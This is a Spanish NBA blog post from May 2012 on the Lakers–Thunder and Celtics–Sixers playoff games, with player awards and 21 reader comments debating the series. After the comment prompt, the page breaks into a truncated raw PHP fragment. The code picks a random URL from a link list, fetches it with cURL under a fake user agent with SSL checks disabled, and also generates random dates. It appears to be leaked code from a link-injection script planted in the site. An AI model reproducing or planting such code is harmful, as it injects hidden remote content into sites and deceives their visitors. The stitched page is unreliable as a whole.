La Crónica: Variantes esenciales

17 de May de 2012 por txusma

Los Lakers fueron lógicamente aplastados a campo abierto en el anterior partido de la serie. Anoche mutaban hacia un perfil mucho más acorde a los antecedentes de Mike Brown y aparentemente más adecuado respecto al rival. No hubo premio por muy poco. Se logró colapsar a Westbrook y Harden y controlar rebotes y tempo. Escapó Kevin Durant de la alambrada y los suyos sobrevivieron gracias a las excelencias defensivas de Ibaka, Sefolosha y el propio Durant. Es la constatación de que es un grupo tan bien preparado para el brillo como para el fango. Con todo, los amarillos lo tenían todo en sus manos. 7 arriba a falta de 2 minutos. Dos errores graves de Kobe, con sus correspondientes dos contras letales, un bloqueo en movimiento de Ibaka y el choque a la basura (75-77). Blake pudo amarrar la victoria, pero no es Fisher. Viaje a L.A. con el 0 en el casillero, con dudas pero con soluciones. ¿Las últimas horas del proyecto? Veremos.

Por su parte los Celtics viraron hacia su versión más brillante en un momento delicado. Parece una contradicción que en un partido donde Ray Allen lanza una única vez a canasta podamos hablar de “jogo bonito” y ultraofensivo. Personalmente opino que el MVP de estos playoffs hasta el momento es Kevin Garnett quien desintegró el juego interior ‘sixer’. Pierce y Rondo se quitaron la espina del anterior choque. Si hay una virtud destacable de estos Celtics es que todos reman hacia la misma dirección independientemente del papel de cada uno en un momento dado. El de ayer es otro ejemplo de manual del juego colectivo. Para enseñar en las escuelas (107-91).

PREMIOS

MVP: Emociona comprobar como es verdad aquello de que los viejos rockeros nunca mueren. Si ayer fue Tim Duncan el que dio lecciones hoy le ha tocado a Kevin Garnett. El ala-pívot de los Celtics se está convirtiendo en el factor diferencial de los Celtics en estos playoffs. Ayer consiguió 27 puntos (12 de 17) y 13 rebotes. Si además tiene la ayuda de Rajon Rondo (23-6-14) y Paul Pierce (24-12-4) los Celtics se convierten en prácticamente invencibles.

Sorpresa: Jodie Meeks enseñó la patita con 13 puntos pero está muy lejos de ser realmente útil para un equipo de playoffs.

Decepción: El juego interior titular de los Sixers (Elton Brand y Spencer Hawes) consiguió 7 puntos con una serie de 3 de 14 en tiros de campo. Se vieron superados por los interiores célticos en todo momento.

Esfuerzo en vano: Ante el poderío verde tan solo Jrue Holiday (15-6-9) y Thaddeus Young (22 puntos) pudieron presentar algo de batalla. Pau Gasol (14-11-3) y Andrew Bynum (20-9) fueron los más destacado de los amarillos en el colapso de Oklhoma City.

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. simon dice:
    #1

    Confieso que no he visto el partido, hoy habia que estudiar y no era plan de trasnochar, pero he visto los dos ultimos minutos y es un desproposito de Kobe en particular y los Lakers en general cada uno de los segundos de los ultimos dos minutos… madremia

      Citar

  2. HisRoyalAirness dice:
    #2

    Ojito al cabreo que se pilla Kobe en el tiro de Blake…con razón. Va a dar que hablar

      Citar

  3. Sancho88 dice:
    #3

    Les han devuelto la remontada de la regular, a ver cómo resuelven esto en casa. Creo que de nada vale sembrar el pánico. El primero no fue significativo de cómo va a ser la serie, éste sí parece más acorde. De todas maneras, yo sí me esperaba este 2-0 teniendo en cuenta las pocas prestaciones de Lakers lejos del Staples. Eso sí, también espero que sepan tener la paciencia suficiente como para no tirar la elimininatoria e igualen a 2 en casa. Parece que ya han hecho los ajustes pertinentes sobre Westbrook, y una vez que controlas la furia desatada de ese chico y lo domesticas, ganarles es más sencillo. Sigo pensando que esto llegará al séptimo

      Citar

  4. Sancho88 dice:
    #4

    Por cierto, a mí no me parece para nada cagada de Blake. Está bien tirado ese triple, ya que es una variante que nadie se espera, Blake está rindiendo bien en estos playoffs en el clutch time, recibe totalmente solo con el tiro abierto, la recepción de balón es buena y el lanzamiento es medianamente bueno también. Ahí nada que objetar. Lo que sí que da penica son los dos pases de mantequilla de Bryant y Blake por los que pierden el partido en esos dos robos. Coño, si hasta en cadetes y categorías así te coge cualquier entrenador pringao y lo primero que hace es entrenar pase y recepción hasta que te sangran las manos. Intensidad, técnica, intensidad, fuerza precisa, contacto visual con el compañero… vamos, de primero de egb… Pues no, llegan estos en unos playoffs de la NBA y deciden que todo eso no vale dando pases de mierda… en fin, tirar un partido así es una pena, pero ya digo que esto no es para impacientarse. Ahora saldrán a morder en el Staples, estoy seguro. OKC no está siendo tan superior como para llevar 2-0, los ajustes en defensa están, y ahora toca concentrarse en cada segundo y en cada ataque. Yo sigo viendo totalmente igualada la eliminatoria, llamadme loco

      Citar

  5. txusma dice:
    #5

    Yo creo que es imposible que el balón le llegue a Kobe en esa jugada. Los Thunder lo defienden a la perfección y Steve Blake está totalmente abierto en la esquina. Lo idiota hubiera sido intentar hacerle llegar la pelota a Kobe por todos los medios y acabar perdiéndola.

      Citar

  6. simon dice:
    #6

    Eso mismo estaba pensando yo, habia mucha distancia entre Kobe y el balon y muchos jugadores entre ellos, por no hablar que al fin y al cabo Blake tenia el balon en una esquinita y de ahi es mas complicado si cabe llevarlo a la otra esquina donde estaba Kobe en 4 segundos sin hacer un pase suicida que dios sabe donde iria… el tiro en principio era comodo, asi que el tiro es correcto, otra cosa es que no entrara… tal y como se prepara el saque de banda es imposible que el balon le llegara a Kobe.

      Citar

  7. simon dice:
    #7

    Por cierto yo apuesto por un 3-1 cuando salgan del Staples, no se porque pero el hecho de que haya un back-to-back en el 3 y 4 creo que puede marcar mucho la serie en su contra, creo que dos partidos seguidos a LAL puede costarle mas y creo que les complica mucho mas la cosa.

      Citar

  8. nba dice:
    #8

    Partido previsible, veremos en el staples si mantienen la concentracion , yo los veo capaces de al menos ganar 1
    Con menudo contratazo se va a hacer Serge Ibaka, yo creo que como el de Deandre Jordan, aunque en el caso de Ibaka merecidisimo.

      Citar

  9. rumbero dice:
    #9

    Sancho88:
    Ahora saldrán a morder en el Staples, estoy seguro. OKC no está siendo tan superior como para llevar 2-0, los ajustes en defensa están, y ahora toca concentrarse en cada segundo y en cada ataque. Yo sigo viendo totalmente igualada la eliminatoria, llamadme loco

    A mi es que estos Thunders me parecen muy serios. Tampoco parecían estar tan lejos los Mavs, sobretodo en los dos primeros partidos, y les clavaron un 4-0. Ayer Lakers parecía que lo tenían y en dos minutos remontan el partido. Parece que los pipiolos han aprendido a ganar aun sin jugar su mejor baloncesto. Es como cuando los Celtics o Spurs se llevan esos partidos ajustados y decimos que es gracias a que tienen ese gen ganador. Pues me da esa impresión con los Thunders, aunque ayer se lo llevaran por dos robos tontos.
    Y desde hoy fan incondicional (mas aun) del barbas. Por auténtico jugón y por ese codazo involuntario al bueno de Metta

      Citar

  10. simon dice:
    #10

    Es que es eso. Creo que son, con diferencia, el mejor equipo de la competición llegados los minutos finales.

      Citar

  11. Sancho88 dice:
    #11

    Bueno, no había pensado en lo de Mavericks realmente… el rosco no es descartable, siendo realistas, pero no sé, esto me huele de otra manera que lo de Mavs. Lakers si se ponen serios pueden parar defensivamente a los Thunder, y fuera de casa yo les he visto pedos mentales muy gordos eh? En abril jugaron fatal fuera de casa, mismamente en el Staples, contra Lakers y tb contra Clippers, que un día les dejaron en 70 y pocos. Por tanto, puedo deducir que al menos uno van a perder casi fijo. Tienen gen ganador, pero Lakers tb. aunque ahora no nos lo creamos. Sessions tiene que aparecer, no puede ser que ahora estemos echando de menos los puntos de Fisher… tiene que demostrar lo que ha estado haciendo los últimos dos meses, porque creo que el resto sí están cumpliendo más o menos y él es la pata coja del equipo. No sé, quizá el tema es que estamos hablando de los Lakers por su historia, porque les hemos visto a estos mismos tíos más o menos ganando dos anillos, y porque es difícil imaginarse su hecatombe final (lo de Mavs el año pasado aún no me lo explico). Al menos, para mí es dificilísimo imaginarme un rosco en el Staples. Eso sería hasta pecaminoso. No sé, sin desmerecer a OKC, Lakers tienen que mantener la honra al menos en su casa ganando todos los partidos allí.

    Pero sí, me uno al grupo de que esto huele a 3-1 saliendo del Staples y Lakers entregando la cuchara en el sexto, quizá con alguna posibilidad de competir en el Cheespeake, pero Thunder resolviendo por 4-1. Ahora es lo que más pinta tiene de ocurrir, pero esto cambiaría si Lakers se ponen serios y defienden el Forum cojones, hostias!!

      Citar

  12. Ru dice:
    #12

    Cuando tiró Blake pensaba que ganaban los Lakers,abierto en la esquina,jugador bastante fiable en esa distancia,sin marca por la semicaraja de Westbrook que se le debió cortar el aire al ver a Blake tan solo…no creo que esté mal tirado,es más,tras el tiro quedaba tiempo para hacer una falta,iba OKC 1 arriba y Kobe quedó lamentándose y se perdieron 2 segundos hasta que Gasol si la hizo.Era casi imposible pero podía darse el milagro.De todas formas se jugó más a lo que quieren los Lakers -OKC 14 tiros menos que en el primer partido- y eso es buena señal para ellos.

    Ahora a seguirlo con vosotros porque me voy de bodorrio y no podré ver los partidos de las 3 noches que vienen,a quién se le ocurre casarse con los PO’s en juego,pss.Al menos sé que estaré bien informado ; )

      Citar

  13. rumbero dice:
    #13

    Sancho88:
    No sé, quizá el tema es que estamos hablando de los Lakers por su historia, porque les hemos visto a estos mismos tíos más o menos ganando dos anillos, y porque es difícil imaginarse su hecatombe final (lo de Mavs el año pasado aún no me lo explico).

    Por ahí iba yo. Tampoco veo un rosco y los Lakers pueden llevarse los dos partidos del Staples perfectamente, pero las sensaciones de esta temporada por parte de los Thunders es de mucha solvencia mientras que los Lakers dependen del día y de la medicación de Brown.

    3 noches de fiesta bodorril!! Pues cuidado con la barra libre Ru

      Citar

  14. Nacho dice:
    #14

    Lo único que se le podría decir a Blake en esa jugada es que podía haber pasado a Bynum en la zona, y que se la jugara él.
    Y la cagada son las bolas perdidas de Bryant así como las malas decisiones (también de Kobe) en los dos últimos minutos.
    Y si bien Brown dió con la tecla defensiva. Aún se le ueden reprochar muchas cosas. Con este tipo, casi prefiero que pasen los Thunder

      Citar

  15. Alfredo dice:
    #15

    Alguien duda que con Bosh lesionado todos playoffs el anillo se va a ir este anho de nuevo para el oeste???

      Citar

  16. MagicJohnson32 dice:
    #16

    Bufff, es increíble que los Lakers hayan perdido ese partido. Y no es ya por los dos últimos minutos, en los que lo hacen absolutamente todo mal. Es que, conforme jugaron los Lakers y conforme jugaron los Thunder, el resultado debería haber sido un +15 para LAL. Corrigieron prácticamente todos los errores y problemas del Game 1, la defensa del pick & roll fue excelente, minimizaron los rebotes ofensivos de los Thunder, neutralizaron a Westbrook, casi cada tapón de Ibaka fue a las manos de un jugador de los Lakers, liberaron a Kobe en defensa y este pudo dedicarse a tapar líneas de pase y robar balones… Y aun así, con dos minutos malos, perdieron.

    En fin, obviamente los Lakers han de mantener la serie en los términos en que se jugó anoche. Pero lo del back to back es un problema, y no pueden permitirse una derrota en casa. Difícil, difícil.

      Citar

  17. sempren dice:
    #17

    Si Perkins puede recuperarse un poco de como estaba ayer, Thunder serán todavía más duros, porque mira que lo hizo mal el amigo en ataque: no se atrevió a entrar en la pintura, tiró melones de escándalo, y cuando le llegaba el balón más dentro, lo soltaba al de al lado sin miramientos (varias pérdidas vinieron de que sus compañeros no se la esperaban, porque era totalmente para él).

    Por lo demás, a Pau le está costando hacer sus cositas en los segundos tiempos, y ahora Sessions está desapareciendo (junto a Barnes y alguno más). Son problemas importantes que deberían mejorar para poder arrancarles algún partido en OKC.

    Por cierto, ¿a alguien más le parecieron insoportables los comentaristas de C+ del partido Thunder-Lakers de ayer? Yo entiendo que sean parciales, me parece lógico y contra los Nuggets vi una parcialidad bien entendida (aunque siendo el equipo de Rudy… ejem… xD), pero lo de ayer clamó al cielo. El empujón en la falta doble de Gasol y Harden fue “sin querer”, cada decisión arbitral era dudosa, etc.
    Y cuando hablaron de Popovich…

      Citar

  18. Sancho88 dice:
    #18

    La Conferencia Este es totalmente ‘sui’ géneris, pero verdaderamente estamos empezando a comprender las finísimas conexiones de equipos como Heat o Bulls, en comparación con edificios más robustos como el de Pacers, Celtics… El concepto equipo como el todo, sin excluir altas dosis de talento. Chicago estaban siempre determinados a las soluciones que pudiera plantear Rose, como los Heat al alto rendimiento de su ‘big three’ en conjunto. Lo mismo pasa con los Clippers y la super dependencia de Paul. En estas circunstancias, el triunfo del juego colectivo viene a premiar al entrenador que busca crecer más allá del resultado, y castiga al que lo deja todo en manos de la individualidad. En estas circunstancias, repito, hay un equipo que debería ganar de calle la NBA, que son los Lakers, pero su entrenador no tiene nivel para desarrollar un equipo que podría tener un potencial inimaginable… En fin, Bulls eliminados y Heat al borde del abismo. El Este está definitivamente loco, y eso me gusta.

    El epílogo del big three original, como lo bauticé en su momento, podría colarse de milagro en unas finales de la NBA que ni pensaron remotamente que podrían volver a alcanzar desde el último batacazo hace dos temporadas. Pensar en una final Celtics-Spurs a lo harwood classic, con Timothy vs Kevin… no solo me hace ponerme los vellos duros como escarpias, sino que reaviva en mí el gusano del baloncesto real, y me hace reivindicarme en el odio a la individualidad pura, tan adorada por algunos seguidores de NBA.

    Perdón por la chapa trascendental y todo eso, pero me parece milagroso lo que está pasando en el Este. De un Bulls-Heat que todos veíamos clarísimo, por dos bajas se han hundido en la miseria dos equipos que parecían tener todos los ingredientes para llevarse la NBA.

      Citar

  19. Sancho88 dice:
    #19

    Lo cual, para finalizar, deja a Thibodeau, pero sobre todo a Spoelstra, con los colores subidos cuanto menos, sobre todo al filipino. Si no eres capaz de meterle más de 80 puntos a un equipo como Pacers en dos juegos consecutivos, que defienden bien pero tampoco son los ‘Bad boys’… pues olvídate del anillo. Yo si fuera Lebron estaría cabreadísimo con el señor que se sienta en ese banquillo… es muy triste.

      Citar

  20. simon dice:
    #20

    Puff cuando eliminaron a Heat dije, ya está el este va a ser un paseo militar de Heat, pero sean las que sean las circunstancias está siendo bastante entretenido, me encantaria que Sixers y Pacers volvieran a ganar el siguiente partido y colocar el 2-2 y el 3-1 en sus series, no pq prefiera que ganen ellos, sino por animar todavia mas el cotarro =D.

    En el Oeste nos encaminamos a ¿ dos barridas ? viendo los primeros partidos podrias pensarlo, pero creo que Clippers y sobretodo Lakers sacaran al menos algun partido, Clippers no lo tengo tan claro. Por cierto me he dado cuenta que el sabado en el staples en el lapso de 7 horas juegan los dos equipos. Teniendo en cuenta que Clippers juega a las 3.30 digamos que el partido habrá acabado sobre las 6 o asi, entre que se va la prensa, desalojan el pabellon y tal, para poder empezar a cambiar la pista que se hagan las 6 y media o 7 y la pista tiene que estar lista mas o menos para las 9. tan solo dos horas tardan en cambiar toda la pista??

    Por cierto, no he seguido la temporada a fondo de los Spurs, sobretodo estadisticamente de sus jugadores, pero juraria que Blair era un tio importante en la rotación y además el respondia con buenos minutos, alguna razon para que este jugando tan poco? o es que simplemente Diaw le ha comido la tostada?

      Citar

  21. GreenPride dice:
    #21

    Bueno pues visto el Lakers-Thunder aún no me lo explico.
    Los Lakers son un equipo experimentado y tenían el partido ganado con 7 puntos de ventaja a 2 minutos. Hasta ese momento habían hecho casi todo bien y arreglado casi todos los problemas del primer partido a saber. Ataque basado en balones interiores a Pau y Bynum, Kobe defendiendo a muerte y dosificándose en ataque, mucha mejor defensa del Pick&Roll sobre Westbrook y Harden y cargando sobre el rebote de ataque para impedir contraataques y poner difíciles las cosas a los Thunder en estático. Además el principal error de OKC fue dar demasiados balones en ataque a los secundarios (Ibaka, Perkins, Collison) que tiraron mientras un acertado Durant no lanzaba demasiado. Y cuando ya veían la orilla… van y se ahogan con la arena en las manos. Me parece increíble que todavía Kobe se cabree con el último tiro de Blake cuando fue el único ataque con sentido en los últimos 2 minutos y pico y repasemos sus cagadas: Le roba un balón Durant que les cuesta un contraataque fácil, falla un tiro desde la línea de fondo, pierde un pase a medias con Blake y falla un triple forzadísimo. Visto esto ¿Todavía se enfada cuando no le pasan el balón estando en la otra parte de la pista y rodeado por 3? Yo creo que más que enfado era frustración porque se reconocía culpable de la derrota.
    Dicho esto, los Lakers perdieron pero encontraron el camino, lo malo es que si esto no les ha dado para ganar, yo veo casi imposible que puedan ganar 4 de los siguientes 5 partidos a estos Thunder. Además como se ha comentado el back to back en el Staples no les beneficia. Me uno a los que ven un 3-1 de vuelta a OKC aunque confío en unos Lakers como en este partido para ver una serie interesante
    Y aunque ya lo dije en el post de ayer no puedo resistirme a comentar el partidazo de los Celtics. Estoy de acuerdo en que Garnett es hasta hoy el MVP de los playoffs y está jugando fenomenal tanto en ataque como en defensa. Ha vuelto a jugar de espaldas al aro lo que le hace mucho más peligroso. Insisto en que la clave del ataque de Boston es que Bass meta sus suspensiones ya que si lo hace la defensa se abre y deja camino a las penetraciones de Rondo y Pierce. Paradójicamente el gran primer cuarto ofensivo de los Sixers les pudo pasar factura ya que los Celtics también entraron en ritmo ofensivo y luego ya no les pudieron parar. Veremos si Philly tira de jugar en casa y juega a muerte en el 4º o si los verdes pueden repetir actuación. Sigo viendo un Celtics en 6 en esta serie.
    Y me voy a ver si los Heat pueden superar la lesión de Bosh y si los Clips pueden hacer algo ante los lanzados Spurs…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>